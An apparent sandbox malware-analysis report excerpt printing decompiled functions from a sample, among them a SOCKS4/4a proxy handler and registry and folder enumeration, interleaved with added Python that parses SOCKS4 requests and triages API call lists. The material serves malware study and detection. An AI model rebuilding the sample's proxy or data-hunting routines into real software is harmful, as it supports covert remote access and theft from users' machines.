    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A419
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • closesocket.WS2_32(?), ref: 0040A42D
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
    • String ID:
    • API String ID: 2355469559-0
    • Opcode ID: d4fb12b96c5ab5b350116c0860b937acd0c4d273c20a53b85eec40d0b549ad6a
    • Instruction ID: 89e52c24bd91186cf4c786c3901de0d589a334b9c456359f7db3651761c680ce
    • Opcode Fuzzy Hash: d4fb12b96c5ab5b350116c0860b937acd0c4d273c20a53b85eec40d0b549ad6a
    • Instruction Fuzzy Hash: 29114CB5801228BEDB20AFA5DC4DCDF7E2CEF453A4B104125F80AB61A0D6749E51DBE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E004055FC(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
    				int _t20;
    				signed int _t21;
    				struct HWND__* _t28;
    				char* _t32;
    
    				_t28 = _a4;
    				if(( *0x423968 & 0x00000004) == 0 || E00412FEE() == 0) {
    					L9:
    					return GetUpdateRect(_t28, _a8, _a12);
    				} else {
    					_t32 = TlsGetValue( *0x4231bc);
    					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
    						goto L9;
    					} else {
    						if(_a8 != 0) {
    							_t6 = _t32 + 0xc; // 0xc
    							E00406EC1( &_a8, _t6, 0x10);
    						}
    						if(_a12 != 0) {
    							_t20 = SaveDC( *(_t32 + 8));
    							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
    							RestoreDC( *(_t32 + 8), _t20);
    						}
    						 *_t32 = 1;
    						return 1;
    					}
    				}
    			}

    APIs
    • GetUpdateRect.USER32 ref: 00405683
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • TlsGetValue.KERNEL32 ref: 0040561C
    • SaveDC.GDI32(?), ref: 0040564C
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0040565C
    • RestoreDC.GDI32(?,00000000), ref: 0040566E
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: 9d6cbb6d7906cf29c964b27409cf5362a78b588da7f507b77140296b6c464afa
    • Instruction ID: 3a1b3d594010145e0e1792a128211bebb79cdf400e28334e839e6c7bd9d2e9cf
    • Opcode Fuzzy Hash: 9d6cbb6d7906cf29c964b27409cf5362a78b588da7f507b77140296b6c464afa
    • Instruction Fuzzy Hash: 8E11C271000749AFDB219F61DC48FAB7BA8EB08311F40883AF94AE21A1C7399851CF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E004057F1() {
    				struct tagMSG _v32;
    				signed int _t12;
    				char _t17;
    				void* _t21;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x4231c4);
    				while(1) {
    					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    					if(_t12 == 0xffffffff) {
    						break;
    					}
    					if(_t12 == 0) {
    						break;
    					}
    					if(_v32.message ==  *0x4231c0 && _v32.wParam == 0xfffffffc) {
    						_t17 = E004050A4( *0x4231c8 + 0x114, _t19, _t21, 0x4231b8, _v32.lParam, 1);
    						_t19 =  *0x4231c8;
    						 *((char*)( *0x4231c8 + 0x124)) = _t17;
    						SetEvent( *0x4231c4);
    					}
    				}
    				return _t12 & 0xffffff00 | _t12 == 0x00000000;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 004057FE
    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00413AA0), ref: 00405805
    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00413AA0), ref: 00405817
    • SetEvent.KERNEL32(004231B8,?,00000001), ref: 00405864
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00405871
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EventThread$CurrentMessagePriority
    • String ID:
    • API String ID: 3943651903-0
    • Opcode ID: 3cb9351b2f99322f2df29763b7823099a077b4d39ce9e2d02afc4db741460e21
    • Instruction ID: 92dfb7eb16e7a5e754c12441c9af3806332768242b83c306331877e0614e2210
    • Opcode Fuzzy Hash: 3cb9351b2f99322f2df29763b7823099a077b4d39ce9e2d02afc4db741460e21
    • Instruction Fuzzy Hash: A801D6326046009BCB20AB75ED05F677774DF44730F540676F920E21F0D6399521CB5E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040FE29,00000000), ref: 0040F9F6
    • ReleaseMutex.KERNEL32(?), ref: 0040FA2A
    • IsWindow.USER32(?), ref: 0040FA31
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 0040FA4B
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 0040FA53
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: c4299a2b058347e6a0033ce58f403cc97a7ff5ecde4475a9d4634968951c3c05
    • Instruction ID: b2c0f3433e7dd703d102c3846a7b1925c29395f2a834ef36a8732b3e700380e5
    • Opcode Fuzzy Hash: c4299a2b058347e6a0033ce58f403cc97a7ff5ecde4475a9d4634968951c3c05
    • Instruction Fuzzy Hash: 1DF01974204300DFD3209F24D8489A7BBF5FB89751B048A79F896A77A1D770A845CB25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00406B66(void* __eflags, signed int _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				signed int _v24;
    				signed int _v29;
    				short _v31;
    				signed char _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				short _v50;
    				char _v52;
    				char _v312;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t59;
    				void* _t61;
    				short _t77;
    				void* _t79;
    				void* _t84;
    				char _t103;
    				char* _t105;
    				signed int _t115;
    				void* _t125;
    				intOrPtr _t126;
    				void* _t127;
    				char _t129;
    				void* _t131;
    				intOrPtr _t132;
    				void* _t133;
    
    				_t110 = _a4;
    				_t59 = E0040A43D(_t110);
    				_push(0);
    				_push( &_v32);
    				_t61 = 7;
    				_v24 = 0 | _t59 == 0x00000017;
    				if(E00409E38(_t61, _t110) != 0) {
    					while(E00409E38(1, _t110,  &_v9, 0) != 0) {
    						if(_v9 == 0) {
    							_t115 = _v29;
    							_t116 = _t115 << 0x10;
    							_v13 = 0x5a;
    							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								L20:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L44:
    									_t55 =  &_v24; // 0x414142
    									return E00406AF0(_t110, 0xffffffff, _v13,  *_t55) & 0xffffff00 | _t73 != 0x00000000;
    								}
    								E00406F38( &_v52,  &_v52, 0, 0x10);
    								_t77 = 2;
    								_v52 = _t77;
    								_t79 = (_v32 & 0x000000ff) - 1;
    								if(_t79 == 0) {
    									_v50 = _v31;
    									_v48 = _v29;
    									_t127 = E00409ECD( &_v52);
    									if(_t127 == 0xffffffff) {
    										L23:
    										_v13 = 0x5b;
    										goto L44;
    									}
    									E0040A280(_t116, _t127);
    									_t50 =  &_v24; // 0x414142
    									_t84 = E00406AF0(_t110, _t127, 0x5a,  *_t50);
    									if(_t84 != 1) {
    										if(_t84 != 0xffffffff) {
    											_v9 = 0;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										_push(_t127);
    										_t84 = E0040A081(_t110);
    									}
    									E0040A228(_t84, _t127);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L34:
    										return _v9;
    									} else {
    										goto L44;
    									}
    								}
    								if(_t79 == 1) {
    									_t129 = E00409FC7( &_v52, 1);
    									_v20 = _t129;
    									if(_t129 == 0xffffffff) {
    										goto L23;
    									}
    									_t32 =  &_v24; // 0x414142
    									_t125 = E00406AF0(_t110, _t129, 0x5a,  *_t32);
    									if(_t125 != 1) {
    										L31:
    										E0040A228(_t89, _t129);
    										if(_t125 == 0xffffffff) {
    											goto L23;
    										}
    										if(_t125 != 1) {
    											_v9 = 0;
    										}
    										goto L34;
    									}
    									_t126 = E0040A1F8( &_v20,  &_a4);
    									_v36 = _t126;
    									E0040A228(_t93, _v20);
    									if(_t126 != 0xffffffff) {
    										E0040A280(_t116, _t126);
    										_t110 = _a4;
    										_t125 = E00406AF0(_a4, _t126, 0x5a, _v24 | 0x00000002);
    										if(_t125 == 1) {
    											_push(_v36);
    											_t89 = E0040A081(_t110);
    										}
    										_t129 = _v36;
    										goto L31;
    									}
    									_t110 = _a4;
    									_v13 = 0x5b;
    									goto L44;
    								}
    								goto L23;
    							}
    							_t131 = 0;
    							while(1) {
    								_t116 = _t110;
    								if(E00409E38(1, _t110,  &_v9, 0) == 0) {
    									goto L1;
    								}
    								_t103 = _v9;
    								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
    								if(_t103 == 0) {
    									_t105 =  &_v312;
    									_v20 = 0;
    									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
    									if(_t105 == 0) {
    										_t132 = _v20;
    										while(_t132 != 0) {
    											if( *((intOrPtr*)(_t132 + 4)) == 2) {
    												E00406EC1( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
    												L19:
    												__imp__freeaddrinfo(_v20);
    												if(_t132 == 0) {
    													goto L12;
    												}
    												goto L20;
    											}
    											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
    										}
    										goto L19;
    									}
    									L12:
    									_v13 = 0x5b;
    									goto L20;
    								}
    								_t131 = _t131 + 1;
    								if(_t131 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}

    APIs
      • Part of subcall function 0040A43D: getsockname.WS2_32(?,?,?), ref: 0040A45B
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00406C35
    • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00406C6E
      • Part of subcall function 0040A280: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040A296
      • Part of subcall function 00406AF0: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00406B14
      • Part of subcall function 0040A081: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040A121
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
    • String ID: BAA$[
    • API String ID: 1849152701-3148893505
    • Opcode ID: 00d027916317091e986b18fda68be662bcf2c97eb40999247dbd1b8b770b6ed6
    • Instruction ID: e603add372eb478c8dbcb6dd8f613e3d5ead5fa8c8945f4ecdd35e39a1949e8c
    • Opcode Fuzzy Hash: 00d027916317091e986b18fda68be662bcf2c97eb40999247dbd1b8b770b6ed6
    • Instruction Fuzzy Hash: E6612771E042586ADF10ABA4CC45AEFBBB99F41314F02457BF853F32C2C27C9921876A
    Uniqueness

    Uniqueness Score: -1.00%
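The function E00406B66 above reads as a SOCKS4/SOCKS4a server handler: after the version byte it consumes a command byte, a 2-byte port and a 4-byte address, skips a NUL-terminated user id one byte at a time, and, when the address is in 0.0.0.1-0.0.0.255 (the `- 1 > 0xfe` test on the byte-swapped value), reads a NUL-terminated host name into a 256-byte buffer (the `<= 0xff` index check) and resolves it with getaddrinfo, keeping the first AF_INET result. It answers with 0x5a (request granted) or 0x5b (request rejected) and then connects (command 1) or listens and accepts (command 2) before relaying. The following Python is an added example written for this page, not code from the report or from the sample: it implements that request layout and reply format for the CONNECT command. Name resolution and the outbound connect are caller-supplied callbacks (an assumption made so the example runs offline); the BIND command and the relay loop are left out, and the packet bytes in the usage block are constructed.

```python
"""SOCKS4/SOCKS4a request parsing and reply building (added example)."""
import struct
from dataclasses import dataclass
from typing import Callable, Optional, Tuple

SOCKS_VERSION = 4
CMD_CONNECT, CMD_BIND = 1, 2
REPLY_GRANTED, REPLY_REJECTED = 0x5A, 0x5B   # the two codes E00406B66 sends
MAX_NAME = 255                               # host name buffer limit seen in the sample


class ProtocolError(ValueError):
    pass


@dataclass
class Socks4Request:
    command: int
    port: int
    ip: bytes                   # 4 bytes, network order
    user_id: bytes
    host: Optional[bytes]       # set only for a SOCKS4a request


def _read_cstring(buf: bytes, pos: int, limit: int) -> Tuple[bytes, int]:
    """Return the NUL-terminated string at pos and the position after the NUL."""
    end = buf.find(b"\0", pos)
    if end < 0 or end - pos > limit:
        raise ProtocolError("missing NUL or string too long")
    return buf[pos:end], end + 1


def parse_request(buf: bytes) -> Tuple[Socks4Request, int]:
    """Parse one request from buf; return it and the number of bytes consumed."""
    if len(buf) < 9 or buf[0] != SOCKS_VERSION:
        raise ProtocolError("not a SOCKS4 request")
    command, port = struct.unpack("!BH", buf[1:4])
    ip = buf[4:8]
    user_id, pos = _read_cstring(buf, 8, len(buf))   # sample reads it unbounded
    host = None
    # SOCKS4a marker: 0.0.0.1 .. 0.0.0.255 means "host name follows".
    if 1 <= int.from_bytes(ip, "big") <= 0xFF:
        host, pos = _read_cstring(buf, pos, MAX_NAME)
    return Socks4Request(command, port, ip, user_id, host), pos


def build_reply(code: int, port: int = 0, ip: bytes = b"\0\0\0\0") -> bytes:
    """8-byte SOCKS4 reply: VN=0, CD=code, DSTPORT, DSTIP."""
    return struct.pack("!BBH4s", 0, code, port, ip)


def handle(buf: bytes,
           resolve: Callable[[bytes], Optional[bytes]],
           connect: Callable[[bytes, int], bool]) -> bytes:
    """Return the reply the proxy would send for this request (CONNECT only)."""
    try:
        req, _ = parse_request(buf)
    except ProtocolError:
        return build_reply(REPLY_REJECTED)
    ip = req.ip
    if req.host is not None:
        ip = resolve(req.host)          # None models getaddrinfo failing / no AF_INET
        if ip is None:
            return build_reply(REPLY_REJECTED)
    if req.command != CMD_CONNECT or not connect(ip, req.port):
        return build_reply(REPLY_REJECTED)
    return build_reply(REPLY_GRANTED, req.port, ip)


if __name__ == "__main__":
    # Constructed SOCKS4a CONNECT to example.test:80 with user id "user".
    pkt = b"\x04\x01\x00\x50\x00\x00\x00\x01user\x00example.test\x00"
    print(handle(pkt, resolve=lambda h: b"\x0a\x00\x00\x01",
                 connect=lambda ip, port: True).hex())
```

A SOCKS4a request with a host name longer than MAX_NAME is rejected rather than truncated, which is the same outcome the sample's bounded copy loop produces when it runs off the end of its buffer.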

    C-Code - Quality: 85%
    			E00418059(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v76;
    				char _v116;
    				char _v636;
    				short _v1156;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E00406F38( &_v12,  &_v12, 0, 8);
    				_t28 = 0x60;
    				E00405B00(_t28,  &_v116);
    				_t30 = 0x61;
    				E00405B00(_t30,  &_v52);
    				_t55 =  &_v636;
    				_t35 = E0040AFA9(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
    						E00417E11(_t65,  &_v1156,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E00406E85(_v12);
    					}
    					_push(0xcb);
    					return E00416CBC(_t54, _v12, 0x63);
    				} else {
    					_t60 =  &_v76;
    					_t39 = 0x62;
    					E00405B00(_t39, _t60);
    					_v28 = 0x23;
    					_v24 = 0x1a;
    					_v20 = 0x26;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v636;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E0040C5AE( &_v636,  &_v16, _t68, 1, 2, E00417E6B,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004180BB
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041810B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: 88d7a8a8f3fb67cd84d61d69578a1805006c048755a232469c75f4121187936e
    • Instruction ID: fd5e1bb54affe013dbafb9bc61e953f2c70cbf62e9079f322912f783debe35dc
    • Opcode Fuzzy Hash: 88d7a8a8f3fb67cd84d61d69578a1805006c048755a232469c75f4121187936e
    • Instruction Fuzzy Hash: 833144B290021CBADF10ABA1DC89FDFB77CEB04314F10456AF605F7181DA785A858B95
    Uniqueness

    Uniqueness Score: -1.00%
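Several of the APIs lists in this section carry the technique in their arguments rather than in the API names: the GetThreadContext/SetThreadContext/VirtualFreeEx trio at 00413E5D-00413EB3 rewrites a thread in another process after checking its Eip against a stored address, E00405E4D only reads the clipboard for CF_TEXT (1), CF_OEMTEXT (7) and CF_UNICODETEXT (0xd), the WSAIoctl control code 48000016 at 0040A3E6 is SIO_ADDRESS_LIST_QUERY (the local interface address list), and E00418059 enumerates CSIDL_COMMON_APPDATA (0x23), CSIDL_APPDATA (0x1a) and CSIDL_PROGRAM_FILES (0x26) after a lookup under HKEY_LOCAL_MACHINE (80000002). The Python below is an added example written for this page, not code from the report or from the sample: it parses the bullet lines the report prints under "APIs", decodes those constants, and matches one function's call set against small technique rules. The rule wording, the function names and the SAMPLE_* strings (copied from the APIs lists above) are this example's own constructions.

```python
"""Triage of the per-function "APIs" lists in a Joe Sandbox report (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet line, with or without a "Part of subcall function" prefix and
# with or without an argument list.
_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for hex, None for "?", str otherwise
    ref: int                        # address of the call site
    subcall: Optional[int] = None   # callee the line was lifted from, if any


def _arg(token: str):
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:              # e.g. the ".exe" string argument
        return token


def parse_api_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            raw = m.group("args")
            calls.append(ApiCall(
                m.group("api"), m.group("mod"),
                [_arg(a) for a in raw.split(",")] if raw else [],
                int(m.group("ref"), 16),
                int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


# WSAIoctl control code layout: direction bits, family bits, function number.
_IOC_DIR = {0x20000000: "VOID", 0x40000000: "OUT", 0x80000000: "IN",
            0xC0000000: "INOUT"}
_IOC_FAMILY = {0x00000000: "UNIX", 0x08000000: "WS2", 0x10000000: "PROTOCOL",
               0x18000000: "VENDOR"}
_SIO = {0x48000016: "SIO_ADDRESS_LIST_QUERY", 0x28000017: "SIO_ADDRESS_LIST_CHANGE",
        0xC8000006: "SIO_GET_EXTENSION_FUNCTION_POINTER", 0x98000001: "SIO_RCVALL"}
_CSIDL = {0x1A: "CSIDL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
          0x26: "CSIDL_PROGRAM_FILES"}
_HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}


def decode_wsa_ioctl(code: int) -> str:
    return "%s (%s, IOC_%s, #%d)" % (
        _SIO.get(code, "unknown"), _IOC_DIR.get(code & 0xE0000000, "?"),
        _IOC_FAMILY.get(code & 0x18000000, "?"), code & 0xFFFF)


def triage(calls: List[ApiCall]) -> List[str]:
    """Human-readable findings for one function's call list, deduplicated."""
    names = {c.api for c in calls}
    findings: List[str] = []

    def add(note: str) -> None:
        if note not in findings:
            findings.append(note)

    if {"GetThreadContext", "SetThreadContext"} <= names:
        note = "rewrites another thread's register context"
        if "VirtualFreeEx" in names:
            note += " and frees memory in a remote process"
        add(note)
    if {"GetClipboardData", "GlobalLock"} <= names:
        add("reads clipboard contents")
    for c in calls:
        if c.api == "WSAIoctl" and len(c.args) > 1 and isinstance(c.args[1], int):
            add("WSAIoctl " + decode_wsa_ioctl(c.args[1]))
        elif c.api == "SHGetFolderPathW" and len(c.args) > 1 and c.args[1] in _CSIDL:
            add("enumerates " + _CSIDL[c.args[1]])
        elif c.api == "RegOpenKeyExW" and c.args and c.args[0] in _HKEY:
            add("opens a key under " + _HKEY[c.args[0]])
    return findings


SAMPLE_THREAD = """
  • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
• GetProcessId.KERNEL32(?), ref: 00413E0B
• GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00413E5D
• SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00413E9D
• VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00413EB3
• CloseHandle.KERNEL32(?,?,?,00000000), ref: 00413EBC
"""
SAMPLE_SOCKET = """
• socket.WS2_32(?,00000002,00000000), ref: 0040A3BC
• WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040A3E6
• WSAGetLastError.WS2_32 ref: 0040A3ED
• WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A419
• closesocket.WS2_32(?), ref: 0040A42D
"""
SAMPLE_FOLDERS = """
  • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004180BB
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041810B
"""

if __name__ == "__main__":
    for name, block in (("thread", SAMPLE_THREAD), ("socket", SAMPLE_SOCKET),
                        ("folders", SAMPLE_FOLDERS)):
        print(name, triage(parse_api_block(block)))
```

The parser keeps "Part of subcall function" lines and records the callee address, because the report attributes those calls to the caller's list even though they sit in a helper; a rule that needs a direct call only can filter on `subcall is None`.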

    C-Code - Quality: 85%
    			E00418909(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v44;
    				char _v68;
    				char _v120;
    				char _v644;
    				short _v1164;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E00406F38( &_v12,  &_v12, 0, 8);
    				_t28 = 0x77;
    				E00405B00(_t28,  &_v120);
    				_t30 = 0x78;
    				E00405B00(_t30,  &_v44);
    				_t55 =  &_v644;
    				_t35 = E0040AFA9(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
    						E004186AC(_t65,  &_v1164,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E00406E85(_v12);
    					}
    					_push(0xcb);
    					return E00416CBC(_t54, _v12, 0x7a);
    				} else {
    					_t60 =  &_v68;
    					_t39 = 0x79;
    					E00405B00(_t39, _t60);
    					_v28 = 0x1a;
    					_v24 = 0x26;
    					_v20 = 0x23;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v644;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E0040C5AE( &_v644,  &_v16, _t68, 1, 2, E004186E4,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041896B
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004189BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: f47c1f37de6d31b88ca5a77e3bfa8115f4afa7e07e86afa6e07b4836c43027aa
    • Instruction ID: 08f2167ec089f64063c422d4dd84e6fc0d0b577a513657c0253e44c789e9ade1
    • Opcode Fuzzy Hash: f47c1f37de6d31b88ca5a77e3bfa8115f4afa7e07e86afa6e07b4836c43027aa
    • Instruction Fuzzy Hash: 4D312DB2D00218ABDF10EAA19C89BDFB77CEB04314F50456AF605B7180DA78AA858B95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0040B4DE(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
    				signed int _v14;
    				signed int _v16;
    				signed int _v20;
    				char _v284;
    				unsigned int _t24;
    				void* _t26;
    				signed int _t28;
    				signed int* _t29;
    				void* _t30;
    				void* _t41;
    				char* _t42;
    				void* _t45;
    				signed int _t46;
    				void* _t47;
    
    				_t45 = __ecx;
    				_t24 = E00406EC1( &_v20, _a4, 0x10);
    				_v20 = _v20 ^ _t24;
    				_v16 = _v16 ^ _t24;
